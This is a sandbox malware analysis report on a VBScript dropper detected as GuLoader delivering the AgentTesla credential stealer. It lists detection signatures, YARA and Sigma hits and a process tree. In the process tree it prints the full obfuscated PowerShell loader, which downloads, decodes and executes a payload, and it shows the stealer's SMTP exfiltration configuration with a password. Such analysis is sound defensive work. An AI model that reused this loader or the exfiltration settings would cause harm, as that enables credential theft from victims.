Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Umulighed.vbs

Overview

General Information

Sample name:Umulighed.vbs
Analysis ID:1430859
MD5:7a879857b435057c4825e33b280baa15
SHA1:d79ea735b0440d929bb6b046974e03915cb8bfd8
SHA256:d15c94ea77716eb5071b879c630b22509e0cee099bb7f9d3f823b8fb57f77d6d
Tags:vbs
Infos:

Detection

AgentTesla, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected AgentTesla
Yara detected GuLoader
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Found suspicious powershell code related to unpacking or dynamic code loading
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hides threads from debuggers
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Scan Loop Network
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 6764 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Umulighed.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 6912 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Unbumped = 1;$Svveflyvers='Substrin';$Svveflyvers+='g';Function Disken($Sthamrenes){$Hotelvrelserne=$Sthamrenes.Length-$Unbumped;For($Acned=5; $Acned -lt $Hotelvrelserne; $Acned+=(6)){$Professorships+=$Sthamrenes.$Svveflyvers.Invoke($Acned, $Unbumped);}$Professorships;}function Jots($Misagent){& ($Jargonens) ($Misagent);}$Orthoarsenite=Disken 'DyrenM.agisoFornozSpasmi GammlcompllJordsaInt,a/ Proa5Gaest.Anu y0slibr ,ters(UnderWTulwaiLyshanFa eldIndsyoStrmpw SnebsC.lam IndtNGu.naT Tabu Balan1Docum0Cowsh. Obl,0Reap.; Ti.l XorinWcataciFusi,nRoya 6Bijug4Cr.ck;Efter ReaffxBalsa6 va,b4.arco;Efter ,andlr Sek.vMilit: nint1fremk2Beiji1Bl,nk.Uncre0 Hard) Albr A,tneG Ga.se Sl.dc s.inkUndero argo/Kazat2Banka0Outs,1impra0Reson0Unapp1Bille0Pikke1eleme RveskF MothiTjenerUnma,ePriapfK.emto AnpaxActiv/Ufo,d1 iru2Pizzl1Tetra.A,opt0Coun ';$Orlops=Disken 'ClaudUPhrensIndhaeDrejerFolk.-Ru,drA CarpgHkasse Unwan relatSuffu ';$Horrify=Disken 'R,nsehEspaltInodot.ranopRent.sFe.ie:,rage/ Kast/SemicdOpfrsrTel,diFlydevHazieeSpeck.Nickeg dtro Bndso DriegHansilAs.emeTradu..asshcBdet.oUnpramPilus/Le.oruSpinncNon.i? FilieFyrsvxSpellpCam.soFragmrTilbatSocia=AttacdPouncoBjergwDekorn.nterlUgekooTalmsaGastrdc,pry&justiiVolumdL,tsv=Uds,y1 CyliuI.rigj istoh IndilSogneMLnninuprveu_ lakuBriksYUncon5MangejAmtsr0 Ga.etTropiuLathevHackeHRail,XO,phasOologbSkovtNMesse0 JohnGInsemftvivl5 BespxAntiacbidraC,untsLOestrQSc.mmuMayorn Ze.eFRacem ';$Cachinnate=Disken 'swine> Kumy ';$Jargonens=Disken 'Unp.uiCo.tre D.ngx aggr ';$Pessimistisk='Blanketten';Jots (Disken 'PredrSInfuse Pr,ntSalgs-Co tiCDiffeoIntelnPaa lt Stboe envanKlaphtKva m Tilbr-RedobPOp,avaUn,xptChlorh urr Er gsTForsl:Homet\ ImpaBKlag,a ContdFlet.nKr,gsiOverdnAfrungUni.ie IsoprDesia.ActustDuplixudstytTiltu Ly.u-FirehVMidshaFl,kel.kspouBortkeEmbry Noto$ ResuPUnblieEp,stsNoncosmven iGarewmIlldiiDra,ts artitPedomiSm lss HypokPe,fe;Folke ');Jots (Disken 'VacatiBekenf Stin Inhal( Lym tOenoleAplodsGonertU.end-Noy npEata.a,ngentKommuhChart JuicT Rigs:tokom\C.uriB JenkaInfardNobilnFor.oiFininnAabengAffa eClairr Nonr.Age.tt til,x,iktotUnbla)Ova o{Hundee nstmxFor oi onant ,xsa}Aand.;Tr,ld ');$Monotonises = Disken 'MadoleBuzzwcPlaceh TromoSmede Affil% otaaCurcip Chrop Bre,dBestta sidetPrincaLegwo%,anke\DyppeKKvg.elAfkoraVoldspCotanj KrisaUnloqgSparetH,alpeProc.rkeesdsErita.DatapSDisple Radap Er,v Thomi& Linj&forko Al.neFalusc HydrhChilioDetru Exone$Rekur ';Jots (Disken ' icho$Al rmgSalgsl EklioKonnibSelfsaAfs.alDe.om:FrnvnSC ianyFac.dnStubbk Le tr alumoIs.denForhisMi levbromomBeboen HngsiChefknPseudgForsms Menu=Fr ki(CatticSkabnmSierrdVr.ma .rusk/Outstc Laic Virtu$,roxiMSt,afo pocn uryoSjleat Scylo Fi.knAgurkiFibersTresaeA.tifsC cre)Mes.n ');Jots (Disken 'Sleke$SkrkpgQuatel,koleoHairmbTrotta AllulKulka: emorpSemitaDogslrUnthraOpfrsdUnderruforroBaadepTiptap,isfoiBemusn HebdgUd ad=Refam$ FreuHFjendo NewlrVinker BasliDdbolfI.oniyChesi. ChrosStuckpMetc,lBrn.oi AnortSomew(Re,br$savanCS.egeaRe.lucArgumhVit eiBastan.lassnBegreaIndurtOp.aveA gra)Sko.e ');$Horrify=$paradropping[0];Jots (Disken 'Hud m$UnodogIndkrlclarsoEddiebCalviaBetonl,lane: SkabP O.taoDgnbulGsbovuSubs.p.earlhSk.ull DeseoPensiiventis GrodbInteroBenc i NonmoKantntUdpumiOutracFyres=LevneNSageseUnsigwPrev -Nek.aOYezgabRealijForsveotorhc ameytSkj e ladSMo tayNonimsFolket S,uleSrkenm Sati.NonreN Antie nvent Pali.IsotoWLdrepe PermbSevenCPalmilHjer iDisape illanSpunstPlugg ');Jots (Disken '.ypos$mi.ilPPanteoRiedelDole uGenerp RefuhCaballUndreoIrreliUnsimsSh,oubhaando Dollitorv.oTrotst CariiYu,escPigta. ugsHporkleHorsta TomodSe aseAmuserunlegsRepro[Gnide$Cey oOFasherBispelvide oforespTritusMorda]Rh zo=Etude$ HavoOUnbacr Vovet LiquhForvao,ipoga.nvinrDriftsU.ganeT ivinNulpuiPlayftJeanieTryne ');$cognitional=Disken 'MinimPG.asfoTr,pulIncoru H.pop UnobhTirzalschooo Hampi eurisT angbSm,aroVi,iliTitleoGry.ttPr.cei St.tcAandf. InfoDOpe.aoRffelwSrprgn Phlol NaggoSvingaUxorid ShriFbagiui.empelUnd reSubs (Optog$B.rbaHAnspno I dgrPartirSemiciBjrgbfAddabyunder,Udgan$ForsiTAdumbamar,emTerzea ScalrSentiiWinl.ncrispd Pu.isOestr1 A.ts1 Wals6Frnd.) Rust ';$cognitional=$Synkronsvmnings[1]+$cognitional;$Tamarinds116=$Synkronsvmnings[0];Jots (Disken ' ,idi$Detecg erenlVikinoE strbJulusaHstpalPib n:MelamR ArchaSovevds,ckeiVeloko kl.us Fug iSuppogdslernteledaSkraelSysteematrarIndl,sAfsky=Sprac( Ko.mTSpasmeLejevs.ostptSter.-PoculP LuggaRebsltMislah Ress Attra$FrenuT ,nisaAmob,mAksela FradrAff.iiDelegnEn obd Udlas Supe1,yper1Centr6Uns r)Du ll ');while (!$Radiosignalers) {Jots (Disken 'hova $S.inkgElectlBunkeo BrowbVarooaLarynlSnitm:A apeLValraeAnalynFeltndTeknoaSamleb DandlkappeeProla=Letal$ IntotKle krSymfou Cal,eUddel ') ;Jots $cognitional;Jots (Disken 'VintrSSkoletOpkbeaHoughrEkspotCotra-dia.oS Un,elCiseleTilste Aal.p Rend Wali4Overt ');Jots (Disken 'Rekap$DunlegCoadvlReh do BnkhbB,trya Un el.torm:InkosR akaoaTheridApostiCratioUnerosB seji Lse gDyscrnTradua,arumlUnikueBags rKlam.sGesjf=Nonre(Ekv.pTOvenfes,kyss Leopttrykv-Bero.PKrigsa RvestAdvarhFlytt estl$ScripTNonsea,ragtmOwleraHyp rr Mor.i DissnFor.idSk ifs Turi1Stra 1Befol6Uforb)Iniss ') ;Jots (Disken 'Temat$Tilb gPen,olReba.oUneteb NondaDamaslTilre:KlasspFi.uroNominrSlipbt .ndsrTilbrt LogatRecolePretar FrateSp.acrPewee= Post$Over gLu url.mhtto SclebKaktua Hegul Joen:ElektDArgumiSeks,fLiparf Pe,cu charsExt at.uple+Titu,+Brobu%Mine $Foll pSt,olaManeurGa,mmaE docd Tranr.rangoAscocpBe,idp Tel.iHastenresprgSkovm.UnocccvenenoBurkluP.cisnhurrytSt.lk ') ;$Horrify=$paradropping[$portrtterer];}Jots (Disken '.mili$pro.rgsaniklUdtolo nfanbLacquaInddmlKolos: rgaMPressaLsepug Satae Wirir MakraEsk,d1 Udkl1Admin6uncov mache=Grami OverlGI soleboto.t apul- ankeCOve,loEndaon,gnaatThirse,lydinBetegtExplo Si i$ overTLnmodaS eepmOversaNicobrTa,shi AnginStilfdvamsescribb1 Ant.1Sylfe6 Fl,r ');Jots (Disken 'G.lde$Forthg,errelLedeto LipibClaspanoncol,roli:NoninPVognprGleadeMargucIhndeoMultinBothrjForm eUnmodcSta dtPro.euRetnir.andhi Lea,nForcogSugep Svag.=Agraf J.ggl[ D ceS p.odyNolossDuffet Bes e isjomPrewe. OperCKldeboAfstenRestavEksemeCorner saurtH men]Ste b:Whett:forfrFBevaerskarnoUdf dmPneumB OrdraH.emtsBaldeeNovel6Elefa4 RapsSKlve,tM.wsarLang iS,ortnCrystgGene.(Smer $TidssM DentaReducgSqu.re NederValfaaBo,ge1.ropo1Veste6 Rejs)Terfe ');Jots (Disken 'Carbo$.eepiggan ilKost oTripobHet raMttetl t,le:Trea.rPassaeOvergbRibbeoBi liuL.vemnSal,ed SobbiTeoren.ammegSk.smnFernaeTvrdrsToldasDo bl Crimb=Manip Affal[ScottSBusteyFulvosrejsetSieseeKabelmSpdbr.BurstT ChokeProgrx Skjotita.i.Br.vbEKoordnvrdilcSlagsopelmadT.knii Ke,nnA.oidgUnimm]Under: Rena:JynxgASemitSSki,dCPashaI LivsI ouch.InputG ,romeFrko tNuzzlS B uit,anatrRestoi Kllen KotegS,erm(Cilio$ Ud oPanasar .vede.ewatcWeedio Am tnSn,bojDioxaeZarenc Bantt gennuForlorElectiD agln PostgToti,)Misav ');Jots (Disken ' Jasm$ForsggDandrlBet.yoRecanbUdgr,aSalutlRural:selskjRefera H.wfmWittebTeh so abrirTopfoeGalletPer mtNedereBelt.nCuber= Lykk$HospirConsueOvertbKedeloDuperuU.salnAadredUdmaniNonadnK.ntogFilmfnTashie SupesSc.nesDissi.NonilsRoseeuUdklabMonchs Sig.tTrinnrWhi.eiPulchnvraisgKunde( Mall3Trimo4Blrek7 tor0Wra p6Telet7Trans,Fo tr2 Boks8go.eb6reapp7opfin3M jor)irri, ');Jots $jamboretten;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7108 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Klapjagters.Sep && echo $" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 6208 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Unbumped = 1;$Svveflyvers='Substrin';$Svveflyvers+='g';Function Disken($Sthamrenes){$Hotelvrelserne=$Sthamrenes.Length-$Unbumped;For($Acned=5; $Acned -lt $Hotelvrelserne; $Acned+=(6)){$Professorships+=$Sthamrenes.$Svveflyvers.Invoke($Acned, $Unbumped);}$Professorships;}function Jots($Misagent){& ($Jargonens) ($Misagent);}$Orthoarsenite=Disken 'DyrenM.agisoFornozSpasmi GammlcompllJordsaInt,a/ Proa5Gaest.Anu y0slibr ,ters(UnderWTulwaiLyshanFa eldIndsyoStrmpw SnebsC.lam IndtNGu.naT Tabu Balan1Docum0Cowsh. Obl,0Reap.; Ti.l XorinWcataciFusi,nRoya 6Bijug4Cr.ck;Efter ReaffxBalsa6 va,b4.arco;Efter ,andlr Sek.vMilit: nint1fremk2Beiji1Bl,nk.Uncre0 Hard) Albr A,tneG Ga.se Sl.dc s.inkUndero argo/Kazat2Banka0Outs,1impra0Reson0Unapp1Bille0Pikke1eleme RveskF MothiTjenerUnma,ePriapfK.emto AnpaxActiv/Ufo,d1 iru2Pizzl1Tetra.A,opt0Coun ';$Orlops=Disken 'ClaudUPhrensIndhaeDrejerFolk.-Ru,drA CarpgHkasse Unwan relatSuffu ';$Horrify=Disken 'R,nsehEspaltInodot.ranopRent.sFe.ie:,rage/ Kast/SemicdOpfrsrTel,diFlydevHazieeSpeck.Nickeg dtro Bndso DriegHansilAs.emeTradu..asshcBdet.oUnpramPilus/Le.oruSpinncNon.i? FilieFyrsvxSpellpCam.soFragmrTilbatSocia=AttacdPouncoBjergwDekorn.nterlUgekooTalmsaGastrdc,pry&justiiVolumdL,tsv=Uds,y1 CyliuI.rigj istoh IndilSogneMLnninuprveu_ lakuBriksYUncon5MangejAmtsr0 Ga.etTropiuLathevHackeHRail,XO,phasOologbSkovtNMesse0 JohnGInsemftvivl5 BespxAntiacbidraC,untsLOestrQSc.mmuMayorn Ze.eFRacem ';$Cachinnate=Disken 'swine> Kumy ';$Jargonens=Disken 'Unp.uiCo.tre D.ngx aggr ';$Pessimistisk='Blanketten';Jots (Disken 'PredrSInfuse Pr,ntSalgs-Co tiCDiffeoIntelnPaa lt Stboe envanKlaphtKva m Tilbr-RedobPOp,avaUn,xptChlorh urr Er gsTForsl:Homet\ ImpaBKlag,a ContdFlet.nKr,gsiOverdnAfrungUni.ie IsoprDesia.ActustDuplixudstytTiltu Ly.u-FirehVMidshaFl,kel.kspouBortkeEmbry Noto$ ResuPUnblieEp,stsNoncosmven iGarewmIlldiiDra,ts artitPedomiSm lss HypokPe,fe;Folke ');Jots (Disken 'VacatiBekenf Stin Inhal( Lym tOenoleAplodsGonertU.end-Noy npEata.a,ngentKommuhChart JuicT Rigs:tokom\C.uriB JenkaInfardNobilnFor.oiFininnAabengAffa eClairr Nonr.Age.tt til,x,iktotUnbla)Ova o{Hundee nstmxFor oi onant ,xsa}Aand.;Tr,ld ');$Monotonises = Disken 'MadoleBuzzwcPlaceh TromoSmede Affil% otaaCurcip Chrop Bre,dBestta sidetPrincaLegwo%,anke\DyppeKKvg.elAfkoraVoldspCotanj KrisaUnloqgSparetH,alpeProc.rkeesdsErita.DatapSDisple Radap Er,v Thomi& Linj&forko Al.neFalusc HydrhChilioDetru Exone$Rekur ';Jots (Disken ' icho$Al rmgSalgsl EklioKonnibSelfsaAfs.alDe.om:FrnvnSC ianyFac.dnStubbk Le tr alumoIs.denForhisMi levbromomBeboen HngsiChefknPseudgForsms Menu=Fr ki(CatticSkabnmSierrdVr.ma .rusk/Outstc Laic Virtu$,roxiMSt,afo pocn uryoSjleat Scylo Fi.knAgurkiFibersTresaeA.tifsC cre)Mes.n ');Jots (Disken 'Sleke$SkrkpgQuatel,koleoHairmbTrotta AllulKulka: emorpSemitaDogslrUnthraOpfrsdUnderruforroBaadepTiptap,isfoiBemusn HebdgUd ad=Refam$ FreuHFjendo NewlrVinker BasliDdbolfI.oniyChesi. ChrosStuckpMetc,lBrn.oi AnortSomew(Re,br$savanCS.egeaRe.lucArgumhVit eiBastan.lassnBegreaIndurtOp.aveA gra)Sko.e ');$Horrify=$paradropping[0];Jots (Disken 'Hud m$UnodogIndkrlclarsoEddiebCalviaBetonl,lane: SkabP O.taoDgnbulGsbovuSubs.p.earlhSk.ull DeseoPensiiventis GrodbInteroBenc i NonmoKantntUdpumiOutracFyres=LevneNSageseUnsigwPrev -Nek.aOYezgabRealijForsveotorhc ameytSkj e ladSMo tayNonimsFolket S,uleSrkenm Sati.NonreN Antie nvent Pali.IsotoWLdrepe PermbSevenCPalmilHjer iDisape illanSpunstPlugg ');Jots (Disken '.ypos$mi.ilPPanteoRiedelDole uGenerp RefuhCaballUndreoIrreliUnsimsSh,oubhaando Dollitorv.oTrotst CariiYu,escPigta. ugsHporkleHorsta TomodSe aseAmuserunlegsRepro[Gnide$Cey oOFasherBispelvide oforespTritusMorda]Rh zo=Etude$ HavoOUnbacr Vovet LiquhForvao,ipoga.nvinrDriftsU.ganeT ivinNulpuiPlayftJeanieTryne ');$cognitional=Disken 'MinimPG.asfoTr,pulIncoru H.pop UnobhTirzalschooo Hampi eurisT angbSm,aroVi,iliTitleoGry.ttPr.cei St.tcAandf. InfoDOpe.aoRffelwSrprgn Phlol NaggoSvingaUxorid ShriFbagiui.empelUnd reSubs (Optog$B.rbaHAnspno I dgrPartirSemiciBjrgbfAddabyunder,Udgan$ForsiTAdumbamar,emTerzea ScalrSentiiWinl.ncrispd Pu.isOestr1 A.ts1 Wals6Frnd.) Rust ';$cognitional=$Synkronsvmnings[1]+$cognitional;$Tamarinds116=$Synkronsvmnings[0];Jots (Disken ' ,idi$Detecg erenlVikinoE strbJulusaHstpalPib n:MelamR ArchaSovevds,ckeiVeloko kl.us Fug iSuppogdslernteledaSkraelSysteematrarIndl,sAfsky=Sprac( Ko.mTSpasmeLejevs.ostptSter.-PoculP LuggaRebsltMislah Ress Attra$FrenuT ,nisaAmob,mAksela FradrAff.iiDelegnEn obd Udlas Supe1,yper1Centr6Uns r)Du ll ');while (!$Radiosignalers) {Jots (Disken 'hova $S.inkgElectlBunkeo BrowbVarooaLarynlSnitm:A apeLValraeAnalynFeltndTeknoaSamleb DandlkappeeProla=Letal$ IntotKle krSymfou Cal,eUddel ') ;Jots $cognitional;Jots (Disken 'VintrSSkoletOpkbeaHoughrEkspotCotra-dia.oS Un,elCiseleTilste Aal.p Rend Wali4Overt ');Jots (Disken 'Rekap$DunlegCoadvlReh do BnkhbB,trya Un el.torm:InkosR akaoaTheridApostiCratioUnerosB seji Lse gDyscrnTradua,arumlUnikueBags rKlam.sGesjf=Nonre(Ekv.pTOvenfes,kyss Leopttrykv-Bero.PKrigsa RvestAdvarhFlytt estl$ScripTNonsea,ragtmOwleraHyp rr Mor.i DissnFor.idSk ifs Turi1Stra 1Befol6Uforb)Iniss ') ;Jots (Disken 'Temat$Tilb gPen,olReba.oUneteb NondaDamaslTilre:KlasspFi.uroNominrSlipbt .ndsrTilbrt LogatRecolePretar FrateSp.acrPewee= Post$Over gLu url.mhtto SclebKaktua Hegul Joen:ElektDArgumiSeks,fLiparf Pe,cu charsExt at.uple+Titu,+Brobu%Mine $Foll pSt,olaManeurGa,mmaE docd Tranr.rangoAscocpBe,idp Tel.iHastenresprgSkovm.UnocccvenenoBurkluP.cisnhurrytSt.lk ') ;$Horrify=$paradropping[$portrtterer];}Jots (Disken '.mili$pro.rgsaniklUdtolo nfanbLacquaInddmlKolos: rgaMPressaLsepug Satae Wirir MakraEsk,d1 Udkl1Admin6uncov mache=Grami OverlGI soleboto.t apul- ankeCOve,loEndaon,gnaatThirse,lydinBetegtExplo Si i$ overTLnmodaS eepmOversaNicobrTa,shi AnginStilfdvamsescribb1 Ant.1Sylfe6 Fl,r ');Jots (Disken 'G.lde$Forthg,errelLedeto LipibClaspanoncol,roli:NoninPVognprGleadeMargucIhndeoMultinBothrjForm eUnmodcSta dtPro.euRetnir.andhi Lea,nForcogSugep Svag.=Agraf J.ggl[ D ceS p.odyNolossDuffet Bes e isjomPrewe. OperCKldeboAfstenRestavEksemeCorner saurtH men]Ste b:Whett:forfrFBevaerskarnoUdf dmPneumB OrdraH.emtsBaldeeNovel6Elefa4 RapsSKlve,tM.wsarLang iS,ortnCrystgGene.(Smer $TidssM DentaReducgSqu.re NederValfaaBo,ge1.ropo1Veste6 Rejs)Terfe ');Jots (Disken 'Carbo$.eepiggan ilKost oTripobHet raMttetl t,le:Trea.rPassaeOvergbRibbeoBi liuL.vemnSal,ed SobbiTeoren.ammegSk.smnFernaeTvrdrsToldasDo bl Crimb=Manip Affal[ScottSBusteyFulvosrejsetSieseeKabelmSpdbr.BurstT ChokeProgrx Skjotita.i.Br.vbEKoordnvrdilcSlagsopelmadT.knii Ke,nnA.oidgUnimm]Under: Rena:JynxgASemitSSki,dCPashaI LivsI ouch.InputG ,romeFrko tNuzzlS B uit,anatrRestoi Kllen KotegS,erm(Cilio$ Ud oPanasar .vede.ewatcWeedio Am tnSn,bojDioxaeZarenc Bantt gennuForlorElectiD agln PostgToti,)Misav ');Jots (Disken ' Jasm$ForsggDandrlBet.yoRecanbUdgr,aSalutlRural:selskjRefera H.wfmWittebTeh so abrirTopfoeGalletPer mtNedereBelt.nCuber= Lykk$HospirConsueOvertbKedeloDuperuU.salnAadredUdmaniNonadnK.ntogFilmfnTashie SupesSc.nesDissi.NonilsRoseeuUdklabMonchs Sig.tTrinnrWhi.eiPulchnvraisgKunde( Mall3Trimo4Blrek7 tor0Wra p6Telet7Trans,Fo tr2 Boks8go.eb6reapp7opfin3M jor)irri, ');Jots $jamboretten;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 5480 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Klapjagters.Sep && echo $" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 5440 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • newfile.exe (PID: 6112 cmdline: "C:\Users\user\AppData\Roaming\newfile\newfile.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • rundll32.exe (PID: 6884 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • newfile.exe (PID: 6152 cmdline: "C:\Users\user\AppData\Roaming\newfile\newfile.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Host": "mail.cash4cars.nz", "Username": "logs@cash4cars.nz", "Password": "logs2024!"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.2957213484.0000000022E8E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000001.00000002.2261833973.00000221E3C09000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
      00000009.00000002.2957213484.0000000022EB1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000004.00000002.2006054606.0000000008700000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
          00000009.00000002.2957213484.0000000022E61000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 7 entries

            Other

            SourceRuleDescriptionAuthorStrings
            amsi64_6912.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
            • 0x100f9:$b2: ::FromBase64String(
            • 0xd481:$s1: -join
            • 0x6c2d:$s4: +=
            • 0x6cef:$s4: +=
            • 0xaf16:$s4: +=
            • 0xd033:$s4: +=
            • 0xd31d:$s4: +=
            • 0xd463:$s4: +=
            • 0xf6b5:$s4: +=
            • 0xf735:$s4: +=
            • 0xf7fb:$s4: +=
            • 0xf87b:$s4: +=
            • 0xfa51:$s4: +=
            • 0xfad5:$s4: +=
            • 0xdb9e:$e4: Get-WmiObject
            • 0xdd8d:$e4: Get-Process
            • 0xdde5:$e4: Start-Process
            amsi32_6208.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
            • 0x1005e:$b2: ::FromBase64String(
            • 0xd481:$s1: -join
            • 0x6c2d:$s4: +=
            • 0x6cef:$s4: +=
            • 0xaf16:$s4: +=
            • 0xd033:$s4: +=
            • 0xd31d:$s4: +=
            • 0xd463:$s4: +=
            • 0xf6b5:$s4: +=
            • 0xf735:$s4: +=
            • 0xf7fb:$s4: +=
            • 0xf87b:$s4: +=
            • 0xfa51:$s4: +=
            • 0xfad5:$s4: +=
            • 0xdb9e:$e4: Get-WmiObject
            • 0xdd8d:$e4: Get-Process
            • 0xdde5:$e4: Start-Process
            • 0x17a75:$e4: Get-Process

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: WScript or CScript Dropper
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Umulighed.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Umulighed.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Umulighed.vbs", ProcessId: 6764, ProcessName: wscript.exe
            Sigma detected: CurrentVersion Autorun Keys Modification
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\newfile\newfile.exe, EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Windows Mail\wab.exe, ProcessId: 5440, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\newfile
            Sigma detected: Suspicious Scan Loop Network
